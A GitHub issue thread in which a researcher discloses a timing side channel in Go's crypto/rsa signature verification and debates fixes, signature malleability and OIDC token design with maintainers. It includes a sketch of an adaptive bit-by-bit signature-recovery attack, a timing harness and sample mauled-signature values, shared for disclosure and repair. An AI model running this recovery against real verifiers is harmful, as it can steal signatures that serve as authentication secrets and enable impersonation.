
crypto/rsa: timing channel in VerifyPKCS1v15 and VerifyPSS via Adaptive Public Key Queries #67043

Open
EthanHeilman opened this issue Apr 25, 2024 · 15 comments · May be fixed by #67044 or #67214
Labels: NeedsInvestigation, Security

Comments

@EthanHeilman

EthanHeilman commented Apr 25, 2024

Go version

1.20, 1.21, 1.22, latest

Output of go env in your module/workspace:

set GO111MODULE=
set GOARCH=amd64
set GOBIN=
set GOCACHE=C:\Users\e0\AppData\Local\go-build
set GOENV=C:\Users\e0\AppData\Roaming\go\env
set GOEXE=.exe
set GOEXPERIMENT=
set GOFLAGS=
set GOHOSTARCH=amd64
set GOHOSTOS=windows
set GOINSECURE=
set GOMODCACHE=C:\Users\e0\go\pkg\mod
set GONOPROXY=
set GONOSUMDB=
set GOOS=windows
set GOPATH=C:\Users\e0\go
set GOPRIVATE=
set GOPROXY=https://proxy.golang.org,direct
set GOROOT=C:\Program Files\Go
set GOSUMDB=sum.golang.org
set GOTMPDIR=
set GOTOOLDIR=C:\Program Files\Go\pkg\tool\windows_amd64
set GOVCS=
set GOVERSION=go1.20.4
set GCCGO=gccgo
set GOAMD64=v1
set AR=ar
set CC=gcc
set CXX=g++
set CGO_ENABLED=0
set GOMOD=C:\Users\e0\Documents\GitHub\gl-test\go.mod
set GOWORK=
set CGO_CFLAGS=-O2 -g
set CGO_CPPFLAGS=
set CGO_CXXFLAGS=-O2 -g
set CGO_FFLAGS=-O2 -g
set CGO_LDFLAGS=-O2 -g
set PKG_CONFIG=pkg-config
set GOGCCFLAGS=-m64 -fno-caret-diagnostics -Qunused-arguments -Wl,--no-gc-sections -fmessage-length=0 -fdebug-prefix-map=C:\Users\e0\AppData\Local\Temp\go-build395051031=/tmp/go-build -gno-record-gcc-switches

What did you do?

This vulnerability was privately disclosed to the golang project via the official security policy. After consultation with them, we agreed that the best course of action would be to open a ticket. I am currently in the process of putting together a PR which fixes the timing channel.

This vulnerability was discovered while looking for side channels in the GQ library in OpenPubkey. I was going through the GQ code with @madars at the MIT DCI and he asked: what happens if SetBytes returns an error?

What did you see happen?

The functions VerifyPKCS1v15 and VerifyPSS in crypto/rsa have a timing channel vulnerability that allows an adversary who can adaptively specify public keys to extract the signature being verified. We provide working proof-of-concept attack code for VerifyPSS and VerifyPKCS1v15. Our code recovers the entire RSA signature about 90% of the time.

This vulnerability has been tested against go 1.20 and the current code in the golang repo. It is likely to impact all recent versions of go.

The Timing Channel

The functions VerifyPKCS1v15 and VerifyPSS call the function encrypt(pub, sig). encrypt in turn attempts to map the signature (plaintext) into the modulus (N) of the RSA public key (pub). If N is smaller than the signature (plaintext), SetBytes will fail and return the error "input overflows the modulus." This causes encrypt to fail immediately without performing any RSA math operations. The time difference between the sig overflowing the modulus N and not overflowing it is roughly the time it takes to verify an RSA signature; in our tests that is roughly 130,000 nanoseconds.

func encrypt(pub *PublicKey, plaintext []byte) ([]byte, error) {
	boring.Unreachable()

	N := bigmod.NewModulusFromBig(pub.N)
	m, err := bigmod.NewNat().SetBytes(plaintext, N)
	if err != nil {
		return nil, err
	}
	e := intToBytes(pub.E)

	return bigmod.NewNat().Exp(m, e, N).Bytes(N), nil
}

To perform the attack, the attacker sets the RSA public key modulus N to the highest value allowed by that key size; in our examples, that would be 2^2049 - 1. The attacker then flips the most significant bit to zero and queries VerifyPKCS1v15 using that public key. If the signature is larger than N, VerifyPKCS1v15 fails quickly; if the signature is smaller than N, it fails only after doing a full RSA verification. Based on how long VerifyPKCS1v15 took, the attacker determines whether the first bit of the signature is 0 or 1. The attacker then sets the bit it learned in the public key modulus and repeats this process to learn the next bit.
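For illustration, here is a minimal, hypothetical sketch of this bit-by-bit query strategy. It is not the proof-of-concept code: it assumes a noiseless timing oracle with a fixed threshold, while the real attack needs several samples per bit and must handle edge cases (for example, the final query produces an even modulus).

// Hypothetical sketch of the adaptive query strategy; names are illustrative.
package timingsketch

import (
	"crypto"
	"crypto/rsa"
	"math/big"
	"time"
)

// recoverSig learns the signature bit by bit by timing VerifyPKCS1v15 against
// attacker-chosen moduli. bits is the key size (e.g. 2048), hashed is the
// digest the verifier checks against, and threshold separates a fast failure
// (sig overflows N, no RSA math) from a slow one (full verification).
func recoverSig(bits, e int, hashed, sig []byte, threshold time.Duration) *big.Int {
	recovered := new(big.Int) // bits of sig recovered so far, most significant first
	for i := bits - 1; i >= 0; i-- {
		// Candidate modulus: the recovered high bits, a 0 at position i,
		// and all 1s below. sig > N exactly when bit i of sig is 1.
		n := new(big.Int).Lsh(recovered, uint(i+1))
		lowOnes := new(big.Int).Sub(new(big.Int).Lsh(big.NewInt(1), uint(i)), big.NewInt(1))
		n.Or(n, lowOnes)

		pub := &rsa.PublicKey{N: n, E: e}
		start := time.Now()
		_ = rsa.VerifyPKCS1v15(pub, crypto.SHA256, hashed, sig) // always fails; only the time matters
		fast := time.Since(start) < threshold

		bit := int64(0)
		if fast {
			bit = 1 // fast failure => sig overflowed N => bit i of sig is 1
		}
		recovered.Lsh(recovered, 1)
		recovered.Or(recovered, big.NewInt(bit))
	}
	return recovered
}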

As shown below, the timing channel is larger in go 1.20 than in the latest code because b2dbfbf changed the RSA encrypt function from return bigmod.NewNat().ExpShort(m, e, N).Bytes(N), nil to return bigmod.NewNat().ExpShortVarTime(m, e, N).Bytes(N), nil. This reduction in the timing channel does not prevent the attack, and we have successfully extracted signatures from both go 1.20 and go latest.

Timing difference on VerifyPKCS1v15 (go 1.20)

Timing difference on VerifyPSS (go 1.20)

Timing difference on VerifyPKCS1v15 (go latest)

Timing difference on VerifyPSS (go latest)
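A minimal sketch of how the gap shown in the figures above can be observed directly is below. Helper names are illustrative and the absolute numbers depend on the machine and Go version; it times VerifyPKCS1v15 once with the real modulus and once with a modulus deliberately smaller than the signature value, so SetBytes overflows and encrypt bails out early.

// Hypothetical measurement sketch, not the benchmark used for the figures.
package timingsketch

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"fmt"
	"math/big"
	"time"
)

func timeVerify(pub *rsa.PublicKey, digest, sig []byte) time.Duration {
	start := time.Now()
	_ = rsa.VerifyPKCS1v15(pub, crypto.SHA256, digest, sig)
	return time.Since(start)
}

// MeasureGap prints the verification time for an in-range signature versus
// a signature that overflows the (attacker-chosen) modulus.
func MeasureGap() error {
	key, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return err
	}
	digest := sha256.Sum256([]byte("timing probe"))
	sig, err := rsa.SignPKCS1v15(rand.Reader, key, crypto.SHA256, digest[:])
	if err != nil {
		return err
	}

	// An odd modulus strictly smaller than the signature value, so the
	// signature overflows it (sketch only; ignores pathological cases).
	small := new(big.Int).SetBytes(sig)
	small.Sub(small, big.NewInt(2))
	if small.Bit(0) == 0 {
		small.Sub(small, big.NewInt(1))
	}

	fmt.Println("in-range modulus:   ", timeVerify(&key.PublicKey, digest[:], sig))
	fmt.Println("overflowing modulus:", timeVerify(&rsa.PublicKey{N: small, E: key.E}, digest[:], sig))
	return nil
}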

Security Impact

We assume an attacker whose goal is to learn a signature and who is able to trigger VerifyPKCS1v15 or VerifyPSS on a public key of the attacker's choice. In theory the attacker learns 1 bit of the signature per query to the verify function; in practice we require 5 queries because the timing measurements are noisy. To recover an entire signature the attacker must have the ability to:

  1. Call verify many times on the same signature with a public key of the attacker's choice, and
  2. choose this public key adaptively based on the results of past queries.

There are many cases in which an RSA signature must be kept secret. For instance, in OpenID Connect the RSA signature on an ID Token functions as an authentication secret. An attacker who learns the RSA signature on an ID Token may be able to fully reconstruct the ID Token and assume the authorization and access privileges of the party to whom the ID Token was issued.

It is very unusual for an attacker to be able to specify, let alone adaptively specify, the public key used to verify a signature. This is the primary reason we consider the impact of this attack lower than a timing channel in signing. That said, there are real-world cases in which an attacker may gain this capability when the attack is chained with another vulnerability; for instance, the attacker may be able to cause faults in the verifying system and flip bits in the public key.

The timing difference leveraged in this attack is large enough to make the attack highly practical. Our unoptimized example code recovers an RSA 2048 signature with ~90% probability in roughly 2 seconds. In a recent test on my Windows desktop machine, I recovered 98 out of 100 2048-bit signatures via VerifyPSS in about 205 seconds (~2 seconds per signature).

What did you expect to see?

I expect RSA verify operations to be constant time, as stated in the comment at the top of crypto/rsa.go:

// Operations in this package are implemented using constant-time algorithms,
// except for [GenerateKey], [PrivateKey.Precompute], and [PrivateKey.Validate].
// Every other operation only leaks the bit size of the involved values, which
// all depend on the selected key size.

This is not the case: the encrypt function in crypto/rsa is not constant time.

We have a simple and short fix which addresses this issue, proposed in PR #67044.

We measured our fix on the latest version of golang, showing that VerifyPKCS1v15 and VerifyPSS are now constant time.

Current is go without the fix; Fixed is go with the fix proposed in PR #67044.
The y-axis is the number of samples in a particular bin.
The x-axis is the time it takes the RSA verify operation to return.

VerifyPKCS1v15 (go latest)

VerifyPSS (go latest)

@EthanHeilman linked a pull request Apr 25, 2024 that will close this issue
@gopherbot

Change https://go.dev/cl/581855 mentions this issue: crypto.rsa: fixes RSA mod overflow timing channel

@odeke-em changed the title from "Timing Channel in VerifyPKCS1v15 and VerifyPSS Via Adaptive Public Key Queries" to "crypto/rsa: timing channel in VerifyPKCS1v15 and VerifyPSS via Adaptive Public Key Queries" Apr 26, 2024
@FiloSottile
Contributor

Thank you for bringing this up, the behavior definitely contradicts the package-level comment.

However, I am not convinced we should try to make verification constant time with respect to the signature. Doing so properly is more complex than CL 581855: for example, emsaPSSVerify is not at all constant time and would need to be rewritten. Constant time checks are much more prone to mistakes, with the potential of introducing signature forgery attacks. For example, I think CL 581855 makes RSA signatures malleable, since m+N is now reduced to m.

My understanding is that public key operations have always been considered public. BoringSSL for example does the same thing we do. If OpenID Connect made an RSA signature an authentication secret... honestly it sounds like they messed up.

On the other hand, I think the opposite attack, recovering the public key with adaptive signature queries, also works, right? That's unfortunate, because I might imagine anonymity systems that verify attacker-controlled signatures using a "secret" public key.

@FiloSottile added the Security and NeedsInvestigation labels Apr 26, 2024
@EthanHeilman
Author

EthanHeilman commented Apr 26, 2024

I appreciate you taking the time to review this. Writing crypto code is always tricky and the more eyes the better.

On the other hand, I think the opposite attack, recovering the public key with adaptive signature queries, also works, right?

Yes, I did not write a proof of concept for it, but this privacy risk was included in my initial disclosure.

However, I am not convinced we should try to make verification constant time with respect to the signature. Doing so properly is more complex than CL 581855: for example, emsaPSSVerify is not at all constant time and would need to be rewritten.

My view is that constant time should be decided on a case-by-case basis. In cases where the fix is easy and introduces minimal performance overhead, it is worth doing. In cases where the fix introduces significant complexity or performance costs, it may not be worth it. For instance, your switch in rsa.encrypt from out.ExpShort(x, 12, m) to out.ExpShortVarTime(x, 12, m) has such a massive increase in performance that I would not argue for it to be constant time unless someone found it introduced a serious practical attack.

For PSSVerify and VerifyPKCS1v15, the fix improves security at no performance cost. If making emsaPSSVerify constant time isn't a good tradeoff then we should document the ways in which it is not constant time and leave it as is.

For example, I think CL 581855 makes RSA signatures malleable, since m+N is now reduced to m.

As far as I can tell, CL 581855 does not make RSA signatures malleable because a mauled RSA signature (m+N) will always fail to verify.

em, encErr := encrypt(pub, sig)
// Only checking if em == nil to avoid timing attacks, encErr
// will be checked at the very end of the function.
// Please see https://golang.org/issue/67043
if em == nil {
  return ErrVerification
}
// ...

if ok != 1 || encErr != nil {
  return ErrVerification
}

If the signature is greater than N, encrypt will return an error in encErr, and encErr is checked before returning, so the signature will never successfully verify. Making RSA signatures malleable would be bad; if I got this wrong, I need to fix it.

If OpenID Connect made an RSA signature an authentication secret... honestly it sounds like they messed up.

Most bearer authentication schemes, including OAuth, OIDC, and JWTs, use signatures, often RSA signatures, as authentication secrets. For example, Google RSA-signs a token which says "I'm Google and the person who holds this token is alice@gmail.com." If you learn the RSA signature, you can reconstruct the token and present it to impersonate Alice.

GQ signatures (ISO/IEC 14888-2:2008) treat RSA signatures as signing keys. We use "filippo.io/bigmod" for constant time GQ Signatures.

@FiloSottile
Contributor

My view is that constant time should be decided on a case-by-case basis. In cases where the fix is easy and introduces minimal performance overhead, it is worth doing. In cases where the fix introduces significant complexity or performance costs, it may not be worth it. For instance, your switch in rsa.encrypt from out.ExpShort(x, 12, m) to out.ExpShortVarTime(x, 12, m) has such a massive increase in performance that I would not argue for it to be constant time unless someone found it introduced a serious practical attack.

For PSSVerify and VerifyPKCS1v15, the fix improves security at no performance cost. If making emsaPSSVerify constant time isn't a good tradeoff then we should document the ways in which it is not constant time and leave it as is.

My approach is a little different: I think we should be clear on what is and what isn't constant time (which currently we aren't, and we need to fix that), and then we need to be perfectly constant time for the things that we document as such (regardless of performance), and optimize for simplicity (or performance) for the rest. Setting clear expectations helps applications figure out if the library fits their need or not.

"More but not fully" constant time is unfortunately not a thing, as an endless string of paper optimizing attacks has proven.

ExpShortVarTime is not justified by being very fast, but by the decision (which I failed to document) that we don't need to be constant time with respect to the public key exponent (because everyone should be using 0x10001 anyway).

We care a lot more about the complexity/review cost than about the performance cost.

If the signature is greater than N, encrypt will return an error in encErr, and encErr is checked before returning, so the signature will never successfully verify.

Hmm, I am not 100% sure here, but if sig < 2^ceil(log2(N)) - N, then sig + N will have the right size but still overflow N, and SetOverflowingBytes will not return an error (because it's meant for ECDSA where it has to reduce) and encErr will be nil. In that case both sig and sig+N would end up valid signatures. Maybe sig can't be made to be that small?

@FiloSottile
Contributor

Most bearer authentication schemes, including OAuth, OIDC and JWTs use signatures, often RSA signatures, as authentication secrets, e.g., Google RSA signs a token which says "I'm google and the person who holds this token is alice@gmail.com." If you learn the RSA signature, you can reconstruct the token and present it to impersonate Alice.

This is really unfortunate. I think this strategy will run up against 20 years of established cryptographic library assumptions that signature verification is public.

Why not sign "I'm Google and the person who holds random(32) is alice@gmail.com" instead, and require knowledge of the secret random(32) to use the signature? I suppose it might be too late, but maybe it would still be easier to make that change/extension than going to every cryptography library and getting them to treat signatures as secrets.

@EthanHeilman
Author

EthanHeilman commented Apr 28, 2024

Why not sign "I'm Google and the person who holds random(32) is alice@gmail.com" instead, and require knowledge of the secret random(32) to use the signature?

Some ID Tokens have a nonce claim which is random(~32) and does prevent forging the ID Token if you only know the RSA signature. The nonce claim was not intended for this purpose and is not a required property of ID Tokens or JWTs in general. For instance, Google only includes the nonce in the first ID Token you receive from Google.

My project, OpenPubkey, uses claims like nonce to commit to a user's public key, turning the ID Token into a public value that functions like a certificate. This or similar patterns could be used to make OIDC signature verification public, but such improvements are still in the early days.

I am not 100% sure here, but if sig < 2^ceil(log2(N)) - N, then sig + N will have the right size but still overflow N,

Yes, you are correct. I misunderstood the SetOverflowingBytes error message "input overflows the modulus size" as covering this case. Looking again, I see the non-byte-length check is "input overflows the modulus." I'm very glad you caught my mistake, and disappointed that I made the mistake in the first place.

Maybe sig can't be made to be that small?

I investigated this and it takes only a few seconds to create such mauled signatures by randomly generating key pairs and then signing random messages until a signature is small enough that sig + N < 2^bitlen(N). The following two signatures both verify for the same message.

Public key N:		 e007aa995662b8e15e4006e87a65217dea058c18d718ff1f2b184ce28f6ca575eb5be856255575f80df4e0ed35cc7b65f10ffb916375e82161e812a7d31e88b37ce73f98161122aa17ff0e08f476553666610ddc475b1d927156a81edb7f8cfeb59d326a6a513f06a06b46b8e1d10923baac0822b2206bfdb5c305b53ae19d8dfd74223dc19aab86b1eafb76c8900364a302c061dc65ed75fead477323a451d1ebf73f633c2e4a36c08a0e29304ff1672fd500171b5ad8d76d6cd14d25f1b39dc995f3757ebdefc8da7453d5ec8f595f07e5d8a039248c2250bf36221661cf386a60267ebaf3550deeb7dcc77cbb2a49837ef2cbe7e3c582ad5f77c266cf9b6d (256)
Sig:		 009bfb983e6129a0df25c677cd2440af51fd5abd62144e20c674a769c20ccd42f5f3c2dcf36c1ec83e8fe95e4aaa526e362876a4f1e440ac8b306700b32e6ed27e23e07182d1f418e23926168e1ccca1bd7e619ad8a63e9022db63e72cc9459acdb3cc424675e620aea282282cdb24ab726911f8f8881e19004ab13493f9d37b7b61dfeb42c7c159627daca1e67e72abaa50727c7d2925abcc7e8b1ad0195e6426254117f1e67dccca01c8780dcb5a45ed4fc4153919ede5fae2fbf9d538f4ae5e4b35a85ff1dede093b1cac6a5f4cdde88732c7f5d7d3995a0e381cb203bd8d92b4063b847fe94ef4cd79c5a63d85b69d8144e0d8ca8a51f4876e726c2cec71  (256) 
Msg:		 test message: 1  
Mauled Sig:	 e0a3a63194c3e2823d65cd604789622d3c02e6d6392d4d3ff18cf44c517972b8e14fab3318c194c04c84ca4b8076cdd427387236555a28cded1879a8864cf785fb0b200998e316c2fa38341f829321d823df6f7720015c2294320c060848d2998350feacb0c725274f0dc8e10eac2dcf2d151a1baaa88a16b60db6e9cedb710978d6022904626ce01468a818af0e76104d5332de598f1321cb2bd28df3bdb036121c807b2e14c8038a8bd6a13e1b4bad1d24c42c5474c6bd684fcd46fb2aa84c27e1291ddeafcea6e3af708256eea63cf06d0b682efc5fbbaacd6e3ec8658cc5fd142cba3f733e5ce385568d22f8b000210037acc0ae4fd4a1e6e634d2fc87de (256)

This is probably a good thing to check for in RSA libraries. I'm likely not the only one who made this mistake.
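For instance, a check along these lines could be added as a unit test. This is a hypothetical sketch, not part of any existing test suite; the test name is illustrative, and the test skips when sig + N happens not to fit in the key size.

// Hypothetical unit-test sketch of the mauled-signature check.
package timingsketch

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"math/big"
	"testing"
)

func TestMauledSignatureRejected(t *testing.T) {
	key, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		t.Fatal(err)
	}
	digest := sha256.Sum256([]byte("test message: 1"))
	sig, err := rsa.SignPKCS1v15(rand.Reader, key, crypto.SHA256, digest[:])
	if err != nil {
		t.Fatal(err)
	}

	// Maul the signature: sig + N. The check is only meaningful when the
	// result still fits in the key size, which is rare for a random key.
	mauled := new(big.Int).Add(new(big.Int).SetBytes(sig), key.N)
	k := key.Size()
	if len(mauled.Bytes()) > k {
		t.Skip("sig + N does not fit in the key size for this key/signature")
	}
	mauledBytes := mauled.FillBytes(make([]byte, k))

	if rsa.VerifyPKCS1v15(&key.PublicKey, crypto.SHA256, digest[:], mauledBytes) == nil {
		t.Error("mauled signature sig+N was accepted")
	}
}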

It seems like using m.SetBytes rather than m.SetOverflowingBytes fixes this, no?

func encrypt(pub *PublicKey, plaintext []byte) ([]byte, error) {
	boring.Unreachable()

	N, err := bigmod.NewModulusFromBig(pub.N)
	if err != nil {
		return nil, err
	}
	m := bigmod.NewNat()
	_, encErr := m.SetBytes(plaintext, N)
	e := uint(pub.E)

	return bigmod.NewNat().ExpShortVarTime(m, e, N).Bytes(N), encErr
}

I want to do more tests and perhaps add a few unit tests to catch some of these cases before merging. Is there some way I can mark CL 581855 as no longer ready for merge?

@FiloSottile
Contributor

Why not sign "I'm Google and the person who holds random(32) is alice@gmail.com" instead, and require knowledge of the secret random(32) to use the signature?

Some ID Tokens have a nonce claim which is random(~32) and does prevent forging the ID Token if you only know the RSA signature. The nonce claim was not intended for this purpose and is not a required property of ID Tokens or JWTs in general. For instance, Google only includes the nonce in the first ID Token you receive from Google.

My project, OpenPubkey, uses claims like nonce to commit to a user's public key, turning the ID Token into a public value that functions like a certificate. This or similar patterns could be used to make OIDC signature verification public, but such improvements are still in the early days.

I think that since you're already applying structure to the nonce, and especially given it's in the early days, you have the opportunity to make OpenPubkey actually safe with the properties that most cryptographic libraries provide.

In practice, I think we all leak at most the public key, the signature, and the hash of the message, but even better would be to put H(random(16+)) in the claim, and require random(16+) to verify the token, so you don't rely on the implicit hashing step and you can tolerate every input to Verify being public.
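A minimal sketch of this kind of construction is below, assuming the token carries H(secret) as a claim and the verifier is shown secret out of band. The helper names are illustrative and not part of any existing OIDC library.

// Hypothetical sketch: commit to a secret in a signed claim.
package timingsketch

import (
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/hex"
)

// NewSecretClaim returns a fresh 16-byte secret and the claim value
// hex(SHA-256(secret)) that the issuer would embed in the signed token.
func NewSecretClaim() (secret []byte, claim string, err error) {
	secret = make([]byte, 16)
	if _, err = rand.Read(secret); err != nil {
		return nil, "", err
	}
	sum := sha256.Sum256(secret)
	return secret, hex.EncodeToString(sum[:]), nil
}

// OpenSecretClaim reports whether the presented secret opens the claim, so
// every input to the signature Verify call can be treated as public.
func OpenSecretClaim(claim string, secret []byte) bool {
	want, err := hex.DecodeString(claim)
	if err != nil {
		return false
	}
	sum := sha256.Sum256(secret)
	return subtle.ConstantTimeCompare(sum[:], want) == 1
}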

I informally spoke with a couple other cryptography library maintainers yesterday and this is really not just about Go. In fact, if you can recommend the best forum to bring this up with the OIDC ecosystem more broadly, I think we'll want to reach out.

This is probably a good thing to check for in RSA libraries. I'm likely not the only one who made this mistake.

Have a look if Wycheproof already has vectors for this, otherwise feel free to make a PR!

It seems like using m.SetBytes rather than m.SetOverflowingBytes fixes this, no?

No, SetBytes takes variable time depending on whether s >= N or not. SetOverflowingBytes was the right idea, but to make this work you'd also have to modify it to return in constant time a 0/1 int that reports whether it reduced, and then use that as part of the ok mask.

However, this is the kind of complexity I am talking about when I say I don't think we want to support this.
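For concreteness, a hypothetical sketch of the "ok mask" idea is below. It assumes a modified SetOverflowingBytes-style helper that reports, in constant time, a 0/1 flag for whether the input was >= N; no such helper exists in crypto/internal/bigmod today, and the names are illustrative.

// Hypothetical sketch of folding an overflow flag into the ok mask.
package timingsketch

import "crypto/subtle"

// verifyWithMask folds the overflow flag into the final comparison so the
// overflowing-signature case and the ordinary-mismatch case are rejected on
// the same code path, in the same amount of time.
func verifyWithMask(em, expected []byte, overflowed int) bool {
	ok := subtle.ConstantTimeCompare(em, expected)
	ok &= subtle.ConstantTimeEq(int32(overflowed), 0)
	return ok == 1
}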

I want to do more tests and perhaps add a few unit tests to catch some of these cases before merging. Is there some way I can mark CL 581855 as no longer ready for merge?

You can mark WIP, but my Hold+1 will prevent merging already.

To be upfront and not to waste your time, I don't think there are good chances we'll merge this or a variant. Rather, I think we'll want to fix the comments about the constant timedness properties we provide.

I would however very much appreciate your help making OpenPubkey and maybe even OIDC robust with the properties we actually provide, partially because again it's not just Go, and you should assume that any successful standard will end up implemented on top of most existing cryptographic libraries.

@EthanHeilman
Author

In practice, I think we all leak at most the public key, the signature, and the hash of the message, but even better would be to put H(random(16+)) in the claim, and require random(16+) to verify the token, so you don't rely on the implicit hashing step and you can tolerate every input to Verify being public.

OpenPubkey commits to three things in the nonce claim: public_key, algorithm, and a random value. This keeps the nonce random, and you can verify the ID Token by opening the commitment in the nonce.

I informally spoke with a couple other cryptography library maintainers yesterday and this is really not just about Go. In fact, if you can recommend the best forum to bring this up with the OIDC ecosystem more broadly, I think we'll want to reach out.

I agree. I've just been staying quiet about other libraries because I haven't disclosed it to them yet. I have not found a library that does not have this behavior. I'm talking to another library maintainer on Wednesday who reached out after seeing this issue.

To be upfront and not to waste your time, I don't think there are good chances we'll merge this or a variant. Rather, I think we'll want to fix the comments about the constant timedness properties we provide.

Thanks, I'll probably put together a fix and likely write up my notes on my blog for my own edification. I understand if golang decides it is too complex to fix.

My original fix checked whether the real signature overflowed and, if it did, substituted the decoy signature for the overflowing signature to keep the timing the same. It didn't seem to fit well within the style of the library.

I would however very much appreciate your help making OpenPubkey and maybe even OIDC robust with the properties we actually provide, partially because again it's not just Go, and you should assume that any successful standard will end up implemented on top of most existing cryptographic libraries.

I can definitely help with OpenPubkey since I'm the main person designing and writing it. OIDC will be trickier as I don't have many connections in the OIDC standards body, and making a change like this would require getting Google, Microsoft, Facebook, Okta, etc. on board. That said, I'd be very interested in pitching OpenPubkey to major OpenID Providers like Google.

@sophieschmieg

I would not consider non-constant-time verification behavior that leaks the message (realistically, the hash of the message), the signature, or the public key a vulnerability of the cryptographic library. A digital signature scheme cryptographically provides existential unforgeability under chosen message attacks [1], but does not give any guarantees about the secrecy of any of its inputs.

Realistically, the message will be hashed before being used by the signature algorithm, in some cases like EdDSA and SLH-DSA several times, so while a construction using hashes of secrets should be fine, we should define and document this property for the larger cryptographic community. I have to admit, I do not currently know how to define this behavior of not leaking inputs to the signature scheme, though.

As for this particular case, I do not think there is a realistic vulnerability here. An attacker with control over the public key used in authentication can just change that public key to one they control, and sign themselves a token in order to impersonate the user, so I agree with Filippo that the main mitigation here is updating the comment to clarify that verification might be variable time.

More generally, there are two things to follow up on here:

  1. We need to ensure that any asymmetrically signed authentication token is unpredictable and contains entropy that is not revealed to a potential attacker. This includes making sure that protocols are not vulnerable to recipient-forwarding attacks and similar. Ideally, signed messages should contain all context necessary to identify a user, like a challenge provided by the verifier to prove freshness, as the nonce does in OIDC. In particular that means that we need to change the nonce to be required in all OIDC flows, if I'm not mistaken.
  2. As mentioned above, we need to document the property of not revealing the original message and only a hash of it, and define it properly, so that algorithm designers and implementers can give the necessary guarantees to protocol designers. I don't have high hopes for being able to get cryptographers to guarantee not leaking the hash of the message, the signature, and the public key, though; in many cases the public key is, for example, directly leaked by knowing just a few or even just one valid message-signature pair (ECDSA, RSA (any padding), and SLH-DSA all leak the public key as far as I can tell, with ML-DSA being the only soon-to-be-standardized exception to this rule).

[1] https://toc.cryptobook.us/book.pdf, attack game 13.1

@EthanHeilman
Author

EthanHeilman commented Apr 29, 2024

This hash of hashes idea is indeed interesting. It reminds me of the use of hashed serial numbers in RSA blind signatures [1,2].

An attacker with control over the public key used in authentication can just change that public key to one they control,

If the signature is used in multiple places, as is sometimes the case with ID Tokens, the aim of an attacker may not be to pass verification on the targeted instance; their aim may be to learn the signature so they can replay it elsewhere. An attacker who can adaptively flip bits of a public key is a fairly uncommon attacker capability. That said, if the fix is simple/low-cost enough, I would like to present my case for fixing it. I am delaying taking a position on this until I have a working fix to determine how simple a fix would be.

On the other hand, if constant time is not a desired property for RSA verification, then shouldn't this allow for performance improvements in the RSA verification functions here? Is there any value in preserving constant-time ops in verification if we are willing to treat verification as public?

In particular that means that we need to change the nonce to be required in all OIDC flows, if I'm not mistaken.

This would certainly help. This solution has some limitations:

  • The nonce is not treated as a secret but instead as a session-binding value. The OIDC client which generates it passes it in the URL to the authentication server. This increases the risk of exposure.
  • The refresh flow is used to help mitigate the risks of compromised ID Tokens. Requiring that the nonce be included in refreshed ID Tokens would provide a real security improvement, but an expired ID Token would leak the nonce used in a refreshed ID Token. Azure in fact currently maintains the nonce through refreshes.
  • The nonce is specified by the OIDC software, often JavaScript, running in an app or web browser. The server signing and issuing ID Tokens cannot force this software to choose a high-entropy nonce.
  • The nonce assumes a flow that allows the party requesting the token to specify a nonce. For instance, adding a nonce to the github-actions OIDC flow would require updating client libraries so that they could supply a nonce.

Moving to OpenPubkey does address this and I'm always in favor of more OpenPubkey, but moving verifiers to OpenPubkey is not a short term solution.

A more immediate solution would be to have the ID Token (or JWT) issuer include a new claim with a random value that has sufficient entropy to make the ID Token unguessable. This approach does roughly the same thing as the nonce, but without the nonce's drawbacks. OpenID Providers could add a new claim to their ID Tokens tomorrow without requiring any changes to clients or verifiers (no one would notice). In fact, the JWT RFC already specifies a claim that is pretty close to what we want:

The "jti" (JWT ID) claim provides a unique identifier for the JWT. The identifier value MUST be assigned in a manner that ensures that there is a negligible probability that the same value will be accidentally assigned to a different data object; if the application uses multiple issuers, collisions MUST be prevented among values produced by different issuers as well. - RFC-7519

[1]: Security Analysis of RSA-BSSA, Anna Lysyanskaya (2022)

[2]: RFC 9474 - RSA Blind Signatures

@EthanHeilman
Author

Making VerifyPKCS1v15 constant time seems like a simple fix because it was designed to be constant time. On the other hand, VerifyPSS does not at all appear to be constant time. Without a larger effort to make VerifyPSS constant time, I don't think it is worth fixing.

The good news is that OIDC only uses PKCS1v15, so fixing PKCS1v15 would address OIDC ID Tokens. OIDC is built on JWS (JSON Web Signatures), and the OIDC spec makes only RSA PKCS1-v1_5 a required signing algorithm.

The spec says: "OPs MUST support signing ID Tokens with the RSA SHA-256 algorithm (an alg value of RS256)". RS256 is defined in RFC-7518 as RSASSA-PKCS1-v1_5 using SHA-256.

@FiloSottile
Contributor

I suppose it depends on whether you consider what I described in #67043 (comment) a simple fix (and I am not convinced I do), but I am not at all comfortable with "most of our Verify functions consider their inputs public, except this old one, because there's a protocol that made wrong assumptions, and we hope they never upgrade to a different algorithm".

@EthanHeilman
Author

EthanHeilman commented May 1, 2024

Here is an early draft of my fix; I'm still testing it and double-checking my assumptions, so early feedback is appreciated. This approach trades off having to run SetOverflowingBytes twice for not touching the encrypt function; the performance hit is about 15%. Alternatively:

  1. I could introduce a constantTimeEncrypt function alongside encrypt that returns a 0/1 int instead of an err.
  2. Or I could replace the err in encrypt with a 0/1 int, but calling functions would lose the custom error messages returned by encrypt. I experimented with passing both a 0/1 int and an err from encrypt, but that seemed like a foot gun because anyone calling it would need to know to check both err and the 0/1 value.

I'm starting to lean towards the constantTimeEncrypt option, although I would need a better name as it isn't actually constant time due to VarExp. It just doesn't leak N or sig.

"most of our Verify functions consider their inputs public, except this old one, because there's a protocol that made wrong assumptions, and we hope they never upgrade to a different algorithm"

Isn't that already the state the library is in right now? VerifyPKCS1v15 has been designed to be constant time, whereas VerifyPSS was not. It seems worthwhile to preserve the constant time properties of VerifyPKCS1v15.

As evidence for your PSS point: while OIDC requires RSA PKCS1v15, JWS allows the use of many more algorithms, including RSA PSS. So there is value in making VerifyPSS constant time as well, as it will likely be increasingly used as an authentication secret. The draft standard Financial-grade API: Client Initiated Backchannel Authentication Profile requires either PS256 (RSA PSS SHA256) or ES256 (ECDSA P-256 SHA256). However, making RSA PSS constant time is a much larger change to the code base, since the non-constant-time behavior in VerifyPSS extends well beyond this single timing channel.

@EthanHeilman
Author

EthanHeilman commented May 6, 2024

@sophieschmieg @FiloSottile
